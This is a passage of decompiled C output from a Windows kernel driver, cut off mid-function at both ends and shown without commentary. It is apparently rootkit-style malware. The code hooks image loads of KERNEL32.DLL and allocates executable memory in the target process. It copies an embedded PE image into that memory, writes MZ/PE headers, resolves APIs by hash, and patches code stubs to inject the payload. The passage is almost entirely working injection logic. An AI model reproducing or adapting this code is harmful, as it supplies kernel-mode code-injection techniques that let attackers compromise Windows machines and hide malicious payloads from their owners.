  int v20; // [sp+34h] [bp-24h]@4
  char v21; // [sp+38h] [bp-20h]@7
  WCHAR *v22; // [sp+3Ch] [bp-1Ch]@10
  char v23; // [sp+44h] [bp-14h]@13
  int v24; // [sp+4Ch] [bp-Ch]@8
  unsigned int v25; // [sp+50h] [bp-8h]@8
  int v26; // [sp+54h] [bp-4h]@8

  if ( sub_11528(L"KERNEL32.DLL", a1) )
  {
    result = sub_114CA((int)Handle, a3);
  }
  else
  {
    result = sub_10580();
    if ( !result )
    {
      i = 0;
      result = sub_11CBE((int)&v20, (int)&i, Handle);
      if ( !i )
      {
        result = v20;
        if ( v20 == *(_DWORD *)(a3 + 4) )
        {
          result = dword_13E99;
          if ( !(dword_13E99 & 4) || !v21 )
          {
            sub_109B6((int)&v13);
            sub_10DEC((int)Handle, v13);
            sub_1097A(v6, (int)&v14);
            v7 = *(_DWORD *)(v14 + 4);
            v4 = *(_DWORD *)(v7 + 8);
            v25 = *(_DWORD *)(v7 + 12);
            v24 = v4;
            v26 = 0;
            v16 = 0;
            v17 = 0;
            sub_10D4A((int)&v24, (int)&v15);
            sub_10B52(v4, (int)&v16, (int)&v24);
            result = sub_10D4A((int)&v24, (int)&v12);
            v5 = v26;
            if ( v26 <= v25 )
            {
              if ( !v15 )
              {
                v22 = 0;
                v18 = 0;
                v19 = 0;
                for ( i = 0; i < v12; result = i )
                {
                  v8 = v5 + v24;
                  v26 = v5 + 16;
                  v15 = v5 + v24;
                  sub_10B52(v4, (int)&v22, (int)&v24);
                  result = sub_10B52(v9, (int)&v18, (int)&v24);
                  v5 = v26;
                  if ( v26 > v25 )
                    break;
                  if ( sub_11528(v22, a1) )
                  {
                    v10 = sub_10F3A((int)&v16, (int)&v23, *(_DWORD *)(v8 + 12));
                    sub_112A6((int)Handle, a3, v15, (int)&v18, v10);
                  }
                  ++i;
                }
              }
            }
          }
        }
      }
    }
  }
  return result;
}
// 122E0: using guessed type wchar_t aKernel32_dll[13];
// 13E99: using guessed type int dword_13E99;

//----- (00010D06) --------------------------------------------------------
KIRQL __stdcall NotifyRoutine(int a1, HANDLE Handle, int a3)
{
  KIRQL result; // al@1

  result = KeGetCurrentIrql();
  if ( result <= 1u )
  {
    if ( Handle )
      result = sub_10B76(a1, Handle, a3);
  }
  return result;
}

//----- (00010D4A) --------------------------------------------------------
int __userpurge sub_10D4A<eax>(int result<eax>, int a2)
{
  int v2; // ecx@1

  v2 = *(_DWORD *)(result + 8);
  if ( (unsigned int)(v2 + 4) <= *(_DWORD *)(result + 4) )
    *(_DWORD *)a2 = *(_DWORD *)(v2 + *(_DWORD *)result);
  *(_DWORD *)(result + 8) = v2 + 4;
  return result;
}

//----- (00010D6C) --------------------------------------------------------
RTL_GENERIC_TABLE *__cdecl sub_10D6C()
{
  memset(&Table, 0, sizeof(Table));
  byte_14168 = -1;
  dword_14164 = 0;
  dword_1416C = 0;
  dword_14170 = 0;
  RtlInitializeGenericTable(
    &Table,
    (PRTL_GENERIC_COMPARE_ROUTINE)CompareRoutine,
    (PRTL_GENERIC_ALLOCATE_ROUTINE)AllocateRoutine,
    (PRTL_GENERIC_FREE_ROUTINE)FreeRoutine,
    0);
  return &Table;
}
// 14164: using guessed type int dword_14164;
// 14168: using guessed type char byte_14168;
// 1416C: using guessed type int dword_1416C;
// 14170: using guessed type int dword_14170;

//----- (00010DAE) --------------------------------------------------------
PVOID __usercall sub_10DAE<eax>(int a1<eax>, RTL_GENERIC_TABLE *a2<edi>)
{
  PKSPIN_LOCK v2; // ecx@1
  PVOID v3; // esi@1
  PVOID v4; // eax@1
  char v5; // zf@1
  KIRQL v6; // dl@2
  int Buffer; // [sp+8h] [bp-18h]@1
  PKSPIN_LOCK SpinLock; // [sp+1Ch] [bp-4h]@1

  Buffer = a1;
  sub_10F10((int)&SpinLock, (int)&a2[1]);
  v4 = RtlLookupElementGenericTable(a2, &Buffer);
  v2 = SpinLock;
  v5 = SpinLock[3] == 1;
  --v2[3];
  v3 = v4;
  if ( v5 )
  {
    v6 = *((_BYTE *)v2 + 4);
    v2[2] = 0;
    KfReleaseSpinLock(v2, v6);
  }
  return v3;
}

//----- (00010DEC) --------------------------------------------------------
signed int __usercall sub_10DEC<eax>(int a1<eax>, RTL_GENERIC_TABLE *a2<edi>)
{
  int v2; // ecx@1
  BOOLEAN v3; // al@1
  char v4; // zf@2
  KIRQL v5; // dl@3
  signed int result; // eax@4
  char v7; // zf@5
  KIRQL v8; // dl@6
  int Buffer; // [sp+8h] [bp-18h]@1
  int v10; // [sp+1Ch] [bp-4h]@1

  Buffer = a1;
  sub_10F10((int)&v10, (int)&a2[1]);
  v3 = RtlDeleteElementGenericTable(a2, &Buffer);
  v2 = v10;
  if ( v3 )
  {
    v7 = *(_DWORD *)(v10 + 12)-- == 1;
    if ( v7 )
    {
      v8 = *(_BYTE *)(v2 + 4);
      *(_DWORD *)(v2 + 8) = 0;
      KfReleaseSpinLock((PKSPIN_LOCK)v2, v8);
    }
    result = 0;
  }
  else
  {
    v4 = *(_DWORD *)(v10 + 12)-- == 1;
    if ( v4 )
    {
      v5 = *(_BYTE *)(v2 + 4);
      *(_DWORD *)(v2 + 8) = 0;
      KfReleaseSpinLock((PKSPIN_LOCK)v2, v5);
    }
    result = -1073741823;
  }
  return result;
}

//----- (00010E46) --------------------------------------------------------
signed int __userpurge sub_10E46<eax>(RTL_GENERIC_TABLE *a1<eax>, int *a2)
{
  RTL_GENERIC_TABLE *v2; // edi@1
  PKSPIN_LOCK v3; // ecx@3
  char v4; // zf@3
  PVOID v6; // eax@7
  char v7; // zf@8
  char v8; // zf@10
  KIRQL v9; // dl@11
  PKSPIN_LOCK SpinLock; // [sp+Ch] [bp-4h]@1

  v2 = a1;
  sub_10F10((int)&SpinLock, (int)&a1[1]);
  if ( sub_10DAE(*a2, v2) && sub_10DEC(*a2, v2) )
  {
    v3 = SpinLock;
    v4 = SpinLock[3] == 1;
    --v3[3];
    if ( !v4 )
      return -1073741823;
    v3[2] = 0;
LABEL_5:
    KfReleaseSpinLock(v3, *((_BYTE *)v3 + 4));
    return -1073741823;
  }
  v6 = RtlInsertElementGenericTable(v2, a2, 0x14u, 0);
  v3 = SpinLock;
  if ( !v6 )
  {
    v7 = SpinLock[3]-- == 1;
    if ( !v7 )
      return -1073741823;
    v3[2] = 0;
    goto LABEL_5;
  }
  v8 = SpinLock[3]-- == 1;
  if ( v8 )
  {
    v9 = *((_BYTE *)v3 + 4);
    v3[2] = 0;
    KfReleaseSpinLock(v3, v9);
  }
  return 0;
}

//----- (00010EC8) --------------------------------------------------------
bool __stdcall CompareRoutine(int a1, int a2, int a3)
{
  bool result; // eax@2

  if ( *(_DWORD *)a2 == *(_DWORD *)a3 )
    result = 2;
  else
    result = *(_DWORD *)a2 >= *(_DWORD *)a3;
  return result;
}

//----- (00010EE6) --------------------------------------------------------
PVOID __stdcall AllocateRoutine(int a1, SIZE_T NumberOfBytes)
{
  return ExAllocatePool(0, NumberOfBytes);
}

//----- (00010EF8) --------------------------------------------------------
void __stdcall FreeRoutine(int a1, PVOID P)
{
  if ( P )
    ExFreePoolWithTag(P, 0);
}

//----- (00010F10) --------------------------------------------------------
int __usercall sub_10F10<eax>(int a1<ebx>, int a2<esi>)
{
  PKTHREAD v2; // edi@1
  KIRQL v3; // al@2

  *(_DWORD *)a1 = a2;
  v2 = KeGetCurrentThread();
  if ( v2 != *(PKTHREAD *)(a2 + 8) )
  {
    v3 = KfAcquireSpinLock((PKSPIN_LOCK)a2);
    *(_DWORD *)(a2 + 12) = 0;
    *(_BYTE *)(a2 + 4) = v3;
    *(_DWORD *)(a2 + 8) = v2;
  }
  ++*(_DWORD *)(a2 + 12);
  return a1;
}

//----- (00010F3A) --------------------------------------------------------
int __userpurge sub_10F3A<eax>(int a1<eax>, int a2<ebx>, int a3)
{
  int v3; // esi@1
  int v4; // ecx@2
  int v5; // ecx@4
  int v7; // [sp+8h] [bp-24h]@2
  unsigned int v8; // [sp+Ch] [bp-20h]@2
  unsigned int v9; // [sp+10h] [bp-1Ch]@2
  int v10; // [sp+14h] [bp-18h]@2
  int v11; // [sp+18h] [bp-14h]@2
  int v12; // [sp+1Ch] [bp-10h]@4
  unsigned int v13; // [sp+20h] [bp-Ch]@2
  unsigned int v14; // [sp+24h] [bp-8h]@3

  v3 = 0;
  if ( a3
    && (v4 = *(_DWORD *)a1,
        v8 = *(_DWORD *)(a1 + 4),
        v7 = v4,
        v9 = 0,
        v10 = 0,
        v11 = 0,
        sub_10D4A((int)&v7, (int)&v13),
        v9 <= v8)
    && (v14 = 0, v13 > 0) )
  {
    while ( 1 )
    {
      sub_10D4A((int)&v7, (int)&v12);
      sub_10B52(v5, (int)&v10, (int)&v7);
      if ( v9 > v8 )
      {
LABEL_7:
        v3 = 0;
        goto LABEL_8;
      }
      if ( a3 == v12 )
        break;
      ++v14;
      if ( v14 >= v13 )
        goto LABEL_7;
    }
    *(_DWORD *)a2 = v10;
    *(_DWORD *)(a2 + 4) = v11;
  }
  else
  {
LABEL_8:
    *(_DWORD *)a2 = v3;
    *(_DWORD *)(a2 + 4) = v3;
  }
  return a2;
}

//----- (00010FC8) --------------------------------------------------------
signed int __userpurge sub_10FC8<eax>(int a1<eax>, int a2, int a3)
{
  signed int result; // eax@1
  PVOID v4; // eax@2
  PVOID v5; // edi@2
  int v6; // eax@4
  int v7; // ebx@4
  unsigned int v8; // esi@4
  void *v9; // ST08_4@4
  int v10; // ecx@10
  char v11; // [sp+Ch] [bp-34h]@1
  int v12; // [sp+10h] [bp-30h]@4
  int v13; // [sp+14h] [bp-2Ch]@4
  int v14; // [sp+28h] [bp-18h]@8
  int v15; // [sp+2Ch] [bp-14h]@7
  unsigned int v16; // [sp+30h] [bp-10h]@8
  int v17; // [sp+34h] [bp-Ch]@8
  unsigned int v18; // [sp+38h] [bp-8h]@4
  int v19; // [sp+3Ch] [bp-4h]@6

  result = sub_11F4C((int)&v11, *(_DWORD *)(a1 + 4));
  if ( !result )
  {
    v4 = sub_115AC(dword_12478 + 4124);
    v5 = v4;
    if ( v4
      && (v7 = (int)((char *)v4 + 4124),
          memcpy(v4, &unk_12D30, 0x101Cu),
          memcpy((char *)v5 + 4124, &unk_1248C, dword_12478),
          *(_WORD *)v7 = 23117,
          *(_DWORD *)(dword_12484 + v7) = 17744,
          *(_WORD *)(dword_12488 + v7) = 267,
          v9 = (void *)(v7 + dword_12480),
          *(_DWORD *)(a3 + 4) = v7 + dword_12480,
          memset(v9, 0, 0x98u),
          *(_DWORD *)(*(_DWORD *)(a3 + 4) + 88) = v5,
          *(_DWORD *)(*(_DWORD *)(a3 + 4) + 96) = v7,
          *(_DWORD *)(*(_DWORD *)(a3 + 4) + 104) = dword_12478,
          v18 = v12 + *(_DWORD *)(v13 + 40),
          v8 = v18,
          (v6 = sub_120E9((int)&v11, v18)) != 0)
      && v12 + *(_DWORD *)(v6 + 8) + *(_DWORD *)(v6 + 12) >= v8 + 12 )
    {
      result = sub_11662(v8, (int)&v11);
      v19 = result;
      if ( !result )
      {
        sub_10922((int)&v15, &v19);
        result = v19;
        if ( !v19 )
        {
          v16 = v18;
          v17 = 12;
          result = (*(int (__stdcall **)(signed int, unsigned int *, int *, signed int, int *))v15)(
                     -1,
                     &v16,
                     &v17,
                     128,
                     &v14);
          if ( !result )
          {
            result = sub_115E4((HANDLE *)(*(_DWORD *)(a3 + 4) + 144));
            if ( !result )
            {
              v10 = v14;
              *(_DWORD *)a3 = a2;
              *(_DWORD *)(a3 + 8) = v7 + dword_1247C;
              *(_DWORD *)(a3 + 12) = v18;
              *(_DWORD *)(*(_DWORD *)(a3 + 4) + 136) = v10;
              result = 0;
            }
          }
        }
      }
    }
    else
    {
      result = -1073741823;
    }
  }
  return result;
}
// 1247C: using guessed type int dword_1247C;
// 12480: using guessed type int dword_12480;
// 12484: using guessed type int dword_12484;
// 12488: using guessed type int dword_12488;

//----- (00011146) --------------------------------------------------------
PVOID __userpurge sub_11146<eax>(int a1<edi>, int a2, int a3)
{
  PVOID result; // eax@1
  PVOID v4; // esi@1
  int v5; // ebx@2

  result = sub_115AC(*(_DWORD *)(a1 + 4) + 40);
  v4 = result;
  if ( result )
  {
    v5 = (int)((char *)result + 40);
    memcpy((char *)result + 40, *(const void **)a1, *(_DWORD *)(a1 + 4));
    *((_DWORD *)v4 + 2) = v5;
    *((_DWORD *)v4 + 4) = *(_DWORD *)(a1 + 4);
    *((_WORD *)v4 + 12) = *(_WORD *)(a2 + 4);
    *((_BYTE *)v4 + 32) = (*(_BYTE *)(a2 + 6) >> 1) & 1;
    *(_DWORD *)v4 = *(_DWORD *)(*(_DWORD *)(a3 + 4) + 112);
    result = *(PVOID *)(a3 + 4);
    *((_DWORD *)result + 28) = v4;
  }
  return result;
}

//----- (000111A2) --------------------------------------------------------
void __userpurge sub_111A2(int a1<eax>, int a2<ecx>, int a3<ebx>, int a4, int a5)
{
  int v5; // esi@1
  char v6; // zf@1
  int v7; // edi@2
  int v8; // edi@4
  int v9; // eax@6
  int v10; // eax@10
  RTL_GENERIC_TABLE *v11; // edi@10
  char v12; // [sp+8h] [bp-30h]@11
  LSA_UNICODE_STRING DestinationString; // [sp+1Ch] [bp-1Ch]@3
  PCWSTR v14; // [sp+24h] [bp-14h]@2
  int v15; // [sp+28h] [bp-10h]@9
  char v16; // [sp+2Ch] [bp-Ch]@1
  int v17; // [sp+30h] [bp-8h]@1
  RTL_GENERIC_TABLE *v18; // [sp+34h] [bp-4h]@10

  v17 = 0;
  v6 = (*(_BYTE *)(a3 + 6) & 2) == 0;
  v5 = a2;
  v16 = 1;
  if ( v6 )
  {
    v7 = *(_DWORD *)(a1 + 4);
    v14 = *(PCWSTR *)a1;
  }
  else
  {
    RtlInitUnicodeString(&DestinationString, *(PCWSTR *)a1);
    if ( sub_10672(&DestinationString, dword_14041, (int)&v16) )
    {
      v9 = *(_DWORD *)v5;
      v7 = *(_DWORD *)(v5 + 4);
    }
    else
    {
      v8 = v17;
      if ( *(_BYTE *)(a3 + 6) & 1 )
        sub_11C42(*(_DWORD *)(a3 + 8), *(_DWORD *)v17, *(_DWORD *)(v17 + 4));
      v9 = *(_DWORD *)v8;
      v7 = *(_DWORD *)(v8 + 4);
    }
    v14 = (PCWSTR)v9;
  }
  v15 = v7;
  if ( v7 )
  {
    sub_109B6((int)&v18);
    v11 = v18;
    v10 = (int)sub_10DAE(a4, v18);
    if ( v10 || !sub_10FC8(a5, a4, (int)&v12) && !sub_10E46(v11, (int *)&v12) && (v10 = (int)sub_10DAE(a4, v11)) != 0 )
      sub_11146((int)&v14, a3, v10);
  }
  sub_10B28((int)&v16);
}
// 14041: using guessed type int dword_14041;

//----- (00011270) --------------------------------------------------------
void __fastcall sub_11270(int a1, int a2, int a3, int a4, int a5)
{
  sub_111A2(a5, a1, a2, a3, a4);
}

//----- (000112A6) --------------------------------------------------------
LONG_PTR __stdcall sub_112A6(int a1, int a2, int a3, int a4, int a5)
{
  void *v5; // ecx@1
  char v7; // [sp+Ch] [bp-28h]@1
  char v8; // [sp+10h] [bp-24h]@5
  char v9; // [sp+18h] [bp-1Ch]@4
  int v10; // [sp+30h] [bp-4h]@1

  v10 = 0;
  sub_11D3C((int)&v7, (int)&v10, a1);
  if ( !v10 )
    sub_11270(a5, a3, a1, a2, a4);
  if ( v7 )
  {
    v7 = 0;
    KeUnstackDetachProcess(&v9);
  }
  return sub_11F3A(v5, (LONG_PTR)&v8);
}
// 123F0: using guessed type int __stdcall KeUnstackDetachProcess(_DWORD);

//----- (000112FC) --------------------------------------------------------
PVOID __stdcall sub_112FC(int a1)
{
  RTL_GENERIC_TABLE *v2; // [sp+8h] [bp-4h]@1

  sub_109B6((int)&v2);
  return sub_10DAE(a1, v2);
}

//----- (0001131C) --------------------------------------------------------
PVOID __stdcall sub_1131C(int a1)
{
  return sub_112FC(a1);
}

//----- (00011350) --------------------------------------------------------
signed int __userpurge sub_11350<eax>(const void *a1<eax>, int a2<ebx>, int a3)
{
  signed int result; // eax@1
  int v4; // ST3C_4@1
  int v5; // esi@2
  char v6; // zf@2
  int v7; // edi@12
  int v8; // ecx@12
  int v9; // esi@12
  char v10; // [sp+8h] [bp-34h]@1
  char v11; // [sp+24h] [bp-18h]@1
  int v12; // [sp+28h] [bp-14h]@2
  int v13; // [sp+2Ch] [bp-10h]@12
  int v14; // [sp+30h] [bp-Ch]@12
  RTL_GENERIC_TABLE *v15; // [sp+38h] [bp-4h]@2

  v4 = *(_DWORD *)(a2 + 4);
  memcpy(&v11, a1, 0x14u);
  result = sub_11F4C((int)&v10, v4);
  if ( !result )
  {
    sub_109B6((int)&v15);
    sub_10DEC(a3, v15);
    v5 = v12;
    *(_DWORD *)v12 = *(_DWORD *)(a2 + 4);
    *(_DWORD *)(v5 + 8) = sub_12145((int)&v10, -934890519);
    *(_DWORD *)(v5 + 16) = sub_12145((int)&v10, -1871298611);
    *(_DWORD *)(v5 + 24) = sub_12145((int)&v10, -1680372695);
    *(_DWORD *)(v5 + 32) = sub_12145((int)&v10, 578844873);
    *(_DWORD *)(v5 + 40) = sub_12145((int)&v10, 1538632765);
    *(_DWORD *)(v5 + 48) = sub_12145((int)&v10, 1538689877);
    *(_DWORD *)(v5 + 56) = sub_12145((int)&v10, -964130467);
    *(_DWORD *)(v5 + 64) = sub_12145((int)&v10, -411935863);
    *(_DWORD *)(v5 + 72) = sub_12145((int)&v10, 122157493);
    result = sub_12145((int)&v10, 201870840);
    v6 = *(_DWORD *)(v5 + 8) == 0;
    *(_DWORD *)(v5 + 80) = result;
    if ( !v6 )
    {
      if ( *(_DWORD *)(v5 + 16) )
      {
        if ( *(_DWORD *)(v5 + 24) )
        {
          if ( *(_DWORD *)(v5 + 32) )
          {
            if ( *(_DWORD *)(v5 + 40) )
            {
              if ( *(_DWORD *)(v5 + 48) )
              {
                if ( *(_DWORD *)(v5 + 56) )
                {
                  if ( *(_DWORD *)(v5 + 64) )
                  {
                    if ( *(_DWORD *)(v5 + 72) )
                    {
                      if ( result )
                      {
                        result = v14;
                        v7 = v5 + 120;
                        v8 = v13;
                        v9 = v14;
                        *(_DWORD *)v7 = *(_DWORD *)v14;
                        v9 += 4;
                        v7 += 4;
                        *(_DWORD *)v7 = *(_DWORD *)v9;
                        *(_DWORD *)(v7 + 4) = *(_DWORD *)(v9 + 4);
                        *(_DWORD *)result = *(_DWORD *)"¸";
                        *(_WORD *)(result + 4) = *(_WORD *)&asc_12470[4];
                        *(_BYTE *)(result + 6) = asc_12470[6];
                        *(_DWORD *)(result + 1) = v8;
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
  return result;
}

//----- (00011498) --------------------------------------------------------
signed int __thiscall sub_11498(int this, int a2, const void *a3)
{
  return sub_11350(a3, this, a2);
}

//----- (000114CA) --------------------------------------------------------
__int32 __stdcall sub_114CA(int a1, int a2)
{
  __int32 result; // eax@1
  const void *v3; // edi@1
  void *v4; // ecx@2
  char v5; // [sp+8h] [bp-28h]@2
  char v6; // [sp+Ch] [bp-24h]@6
  char v7; // [sp+14h] [bp-1Ch]@5
  int v8; // [sp+2Ch] [bp-4h]@2

  result = (__int32)sub_1131C(a1);
  v3 = (const void *)result;
  if ( result )
  {
    v8 = 0;
    sub_11D3C((int)&v5, (int)&v8, a1);
    if ( !v8 )
      sub_11498(a2, a1, v3);
    if ( v5 )
    {
      v5 = 0;
      KeUnstackDetachProcess(&v7);
    }
    result = sub_11F3A(v4, (LONG_PTR)&v6);
  }
  return result;
}
// 123F0: using guessed type int __stdcall KeUnstackDetachProcess(_DWORD);

//----- (00011528) --------------------------------------------------------
char __usercall sub_11528<al>(WCHAR *a1<eax>, int a2<ecx>)
{
  WCHAR *v2; // edi@1
  int v3; // esi@1
  WCHAR v4; // dx@2
  unsigned int v5; // eax@3
  int v6; // edx@3
  char result; // al@4
  int v8; // eax@5
  WCHAR *v9; // esi@6
  WCHAR v10; // bx@7
  int v11; // [sp+8h] [bp-Ch]@3
  unsigned int v12; // [sp+Ch] [bp-8h]@5
  int v13; // [sp+10h] [bp-4h]@6

  v2 = a1;
  v3 = (int)(a1 + 1);
  do
  {
    v4 = *a1;
    ++a1;
  }
  while ( v4 );
  v6 = (signed int)((char *)a1 - v3) >> 1;
  v5 = (unsigned __int16)(*(_WORD *)a2 >> 1);
  v11 = v6;
  if ( v6 <= v5 )
  {
    v12 = 0;
    v8 = *(_DWORD *)(a2 + 4) + 2 * (v5 - v6);
    if ( v6 )
    {
      v13 = v8 - (_DWORD)v2;
      v9 = v2;
      while ( 1 )
      {
        v10 = RtlUpcaseUnicodeChar(*(WCHAR *)((char *)v9 + v13));
        if ( RtlUpcaseUnicodeChar(*v9) != v10 )
          break;
        ++v12;
        ++v9;
        if ( v12 >= v11 )
          goto LABEL_9;
      }
      result = 0;
    }
    else
    {
LABEL_9:
      result = 1;
    }
  }
  else
  {
    result = 0;
  }
  return result;
}

//----- (000115AC) --------------------------------------------------------
PVOID __usercall sub_115AC<eax>(ULONG a1<esi>)
{
  PVOID result; // eax@3
  PVOID BaseAddress; // [sp+0h] [bp-8h]@1
  ULONG AllocationSize; // [sp+4h] [bp-4h]@1

  BaseAddress = 0;
  AllocationSize = a1;
  if ( ZwAllocateVirtualMemory((HANDLE)0xFFFFFFFF, &BaseAddress, 0, &AllocationSize, 0x1000u, 0x40u)
    || AllocationSize < a1 )
    result = 0;
  else
    result = BaseAddress;
  return result;
}

//----- (000115E4) --------------------------------------------------------
int __usercall sub_115E4<eax>(HANDLE *a1<edi>)
{
  signed int v1; // esi@1
  int i; // esi@6
  HANDLE Handle; // [sp+4h] [bp-4Ch]@3
  OBJECT_ATTRIBUTES ObjectAttributes; // [sp+24h] [bp-2Ch]@1
  struct _IO_STATUS_BLOCK IoStatusBlock; // [sp+3Ch] [bp-14h]@2
  LSA_UNICODE_STRING DestinationString; // [sp+44h] [bp-Ch]@1
  NTSTATUS v8; // [sp+4Ch] [bp-4h]@2

  RtlInitUnicodeString(&DestinationString, &SourceString);
  ObjectAttributes.RootDirectory = 0;
  ObjectAttributes.SecurityDescriptor = 0;
  ObjectAttributes.SecurityQualityOfService = 0;
  ObjectAttributes.Length = 24;
  ObjectAttributes.Attributes = 64;
  ObjectAttributes.ObjectName = &DestinationString;
  v1 = 0;
  while ( 1 )
  {
    v8 = ZwOpenFile(a1, 0xC0100000u, &ObjectAttributes, &IoStatusBlock, 3u, 0x60u);
    if ( v8 )
      break;
    *(&Handle + v1++) = *a1;
    if ( v1 > 7 )
      goto LABEL_6;
  }
  ++v1;
LABEL_6:
  for ( i = v1 - 2; i >= 0; --i )
    ZwClose(*(&Handle + i));
  return v8;
}

//----- (00011662) --------------------------------------------------------
signed int __stdcall sub_11662(unsigned int a1, int a2)
{
  signed int result; // eax@2
  int v3; // eax@3
  int v4; // edx@6
  int v5; // ecx@6
  unsigned int v6; // eax@7
  unsigned int v7; // eax@9
  unsigned int v8; // edi@10
  int v9; // eax@11
  int i; // [sp+0h] [bp-10h]@6
  unsigned int v11; // [sp+4h] [bp-Ch]@10
  int v12; // [sp+8h] [bp-8h]@3
  int v13; // [sp+Ch] [bp-4h]@3

  if ( *(_DWORD *)(a2 + 4) == *(_DWORD *)(*(_DWORD *)(a2 + 8) + 52)
    || (v13 = 0, v12 = 0, v3 = sub_1202D(a2, 5u, (int)&v13, (int)&v12), v3 == 2) )
  {
    result = 0;
  }
  else
  {
    if ( v3 )
    {
      result = -1073741823;
    }
    else
    {
      v5 = v13;
      v4 = v13 + 8;
      for ( i = v13 + v12; v5 + 8 <= (unsigned int)i; v13 = v5 )
      {
        v6 = *(_DWORD *)(v5 + 4);
        if ( !v6 )
          break;
        if ( v6 < 8 || (v7 = v6 - 8, v7 & 1) )
          return -1073741823;
        v11 = v7 >> 1;
        v8 = 0;
        if ( v7 >> 1 )
        {
          do
          {
            v9 = *(_DWORD *)(a2 + 4) + *(_DWORD *)v5 + (*(_WORD *)(v4 + 2 * v8) & 0xFFF);
            if ( *(_WORD *)(v4 + 2 * v8) & 0xF000 )
            {
              if ( v9 >= a1 && v9 < a1 + 12 )
                return -1073741637;
            }
            ++v8;
          }
          while ( v8 < v11 );
        }
        v5 += *(_DWORD *)(v5 + 4);
        v4 = v5 + 8;
      }
      result = 0;
    }
  }
  return result;
}

//----- (0001172E) --------------------------------------------------------
char __fastcall sub_1172E(int a1, int a2)
{
  int v2; // eax@1

  v2 = *(_DWORD *)(a2 + 36);
  return !(v2 & 0x2000000)
      && v2 & 0x20000000
      && v2 & 0x20
      && v2 & 0x40000000
      && (!strncmp((const char *)a2, ".text", 8) || !strncmp((const char *)a2, "PAGE", 8));
}

//----- (00011788) --------------------------------------------------------
char __usercall sub_11788<al>(int a1<edi>)
{
  unsigned int v1; // ecx@1

  v1 = 0;
  while ( (byte_1243C[v1] & *(&byte_1243C[v1] + a1 - (_DWORD)byte_1243C)) == byte_12428[v1] )
  {
    ++v1;
    if ( v1 >= 0x14 )
      return *(_DWORD *)(a1 + 13) - *(_DWORD *)((char *)&ZwAllocateVirtualMemory + 13) == (_DWORD)((char *)ZwAllocateVirtualMemory
                                                                                                 - a1);
  }
  return 0;
}

//----- (000117CA) --------------------------------------------------------
int __userpurge sub_117CA<eax>(int a1<eax>, int a2<ebx>, unsigned int a3)
{
  int v3; // esi@1
  int v4; // edx@4
  int v5; // edi@4
  int v6; // edx@5
  unsigned int v7; // eax@6
  int v9; // [sp-4h] [bp-10h]@4
  unsigned int v10; // [sp+8h] [bp-4h]@1

  v10 = 0;
  v3 = a1;
  while ( 1 )
  {
    if ( a3 <= v3 + 5 )
      return 0;
    if ( *(_BYTE *)v3 == -24 )
    {
      v5 = *(_DWORD *)(v3 + 1) + v3 + 5;
      v4 = sub_120E9(a2, v5);
      if ( v4 )
      {
        if ( sub_1172E(v9, v4) )
        {
          v7 = *(_DWORD *)(v6 + 8);
          if ( v7 >= *(_DWORD *)(v6 + 16) )
            v7 = *(_DWORD *)(v6 + 16);
          if ( v5 + 20 <= v7 + *(_DWORD *)(a2 + 4) + *(_DWORD *)(v6 + 12) && sub_11788(v5) )
            break;
        }
      }
    }
    ++v10;
    ++v3;
    if ( v10 >= 0x1E )
      return 0;
  }
  return v5;
}

//----- (0001183C) --------------------------------------------------------
const char *__usercall sub_1183C<eax>(const char *result<eax>, int a2<ecx>)
{
  int v2; // ebx@1

  v2 = a2 - 19;
  while ( (unsigned int)result < v2 )
  {
    while ( (unsigned int)result <= v2 - 4 )
    {
      if ( *(_DWORD *)result == dword_12450 )
        goto LABEL_7;
      ++result;
    }
    result = 0;
LABEL_7:
    if ( !result )
      break;
    if ( !strncmp(result, (const char *)&dword_12450, 14) )
      return result;
    ++result;
  }
  return 0;
}
// 12450: using guessed type int dword_12450;

//----- (00011884) --------------------------------------------------------
int __stdcall sub_11884(int a1, const char *a2, unsigned int a3, int a4, int a5)
{
  int result; // eax@2
  const char *v6; // ebx@7
  int v7; // eax@17
  unsigned int v8; // ecx@17
  int v9; // eax@24
  int v10; // [sp+Ch] [bp-4h]@7
  int v11; // [sp+Ch] [bp-4h]@14

  *(_BYTE *)a5 = 0;
  if ( sub_1089A(0) )
  {
    result = (int)sub_1183C(a2, a3);
    if ( result )
    {
      if ( *(_DWORD *)a4 && result != *(_DWORD *)a4 )
        *(_BYTE *)a5 = 1;
      else
        *(_DWORD *)a4 = result;
    }
  }
  else
  {
    v6 = a2;
    result = a3 - 10;
    v10 = (int)a2;
    if ( (unsigned int)a2 < a3 - 10 )
    {
      while ( 2 )
      {
        for ( result = v10; ; ++result )
        {
          if ( result > a3 - 14 )
          {
            v11 = 0;
            goto LABEL_15;
          }
          if ( *(_DWORD *)result == dword_12420 )
            break;
        }
        v11 = result;
LABEL_15:
        if ( v11 )
        {
          if ( !strncmp((const char *)v11, (const char *)&dword_12420, 5) )
          {
            v8 = 0;
            v7 = v11;
            while ( (unsigned int)&v6[v8] < v11 )
            {
              if ( *(_BYTE *)v7 == -24
                && (NTSTATUS (__stdcall *)(HANDLE, PVOID *, ULONG, PULONG, ULONG, ULONG))(*(_DWORD *)(v7 + 1) + v7 + 5) == ZwAllocateVirtualMemory )
              {
                v9 = sub_117CA(v11, a1, a3);
                if ( !v9 )
                  break;
                if ( !*(_DWORD *)a4 || v9 == *(_DWORD *)a4 )
                {
                  *(_DWORD *)a4 = v9;
                  break;
                }
                result = a5;
                *(_BYTE *)a5 = 1;
                return result;
              }
              ++v8;
              --v7;
              if ( v8 >= 0x78 )
                break;
            }
          }
          v10 = v11 + 1;
          result = v10;
          if ( v10 < a3 - 10 )
          {
            v6 = a2;
            continue;
          }
        }
        break;
      }
    }
  }
  return result;
}
// 12420: using guessed type int dword_12420;

//----- (00011994) --------------------------------------------------------
int *__cdecl sub_11994()
{
  int v0; // ebx@1
  int v1; // eax@2
  int v2; // ecx@3
  signed int v3; // eax@3
  int v4; // ST10_4@3
  __int16 v5; // di@4
  int v6; // esi@4
  int v7; // edx@5
  unsigned int v8; // ecx@6
  int v9; // eax@8
  const char *v10; // ST04_4@8
  char v12; // [sp+Ch] [bp-28h]@3
  int v13; // [sp+1Ch] [bp-18h]@4
  unsigned __int16 v14; // [sp+20h] [bp-14h]@4
  int v15; // [sp+28h] [bp-Ch]@2
  int v16; // [sp+2Ch] [bp-8h]@4
  char v17; // [sp+33h] [bp-1h]@8

  v0 = 0;
  dword_14134 = 0;
  if ( !dword_14138 )
  {
    v1 = sub_11E4C();
    v15 = v1;
    if ( v1 )
    {
      v3 = sub_11F4C((int)&v12, v1);
      v2 = v4;
      if ( !v3 )
      {
        v5 = v14;
        v6 = v13;
        v16 = 0;
        if ( v14 > 0u )
        {
          while ( 1 )
          {
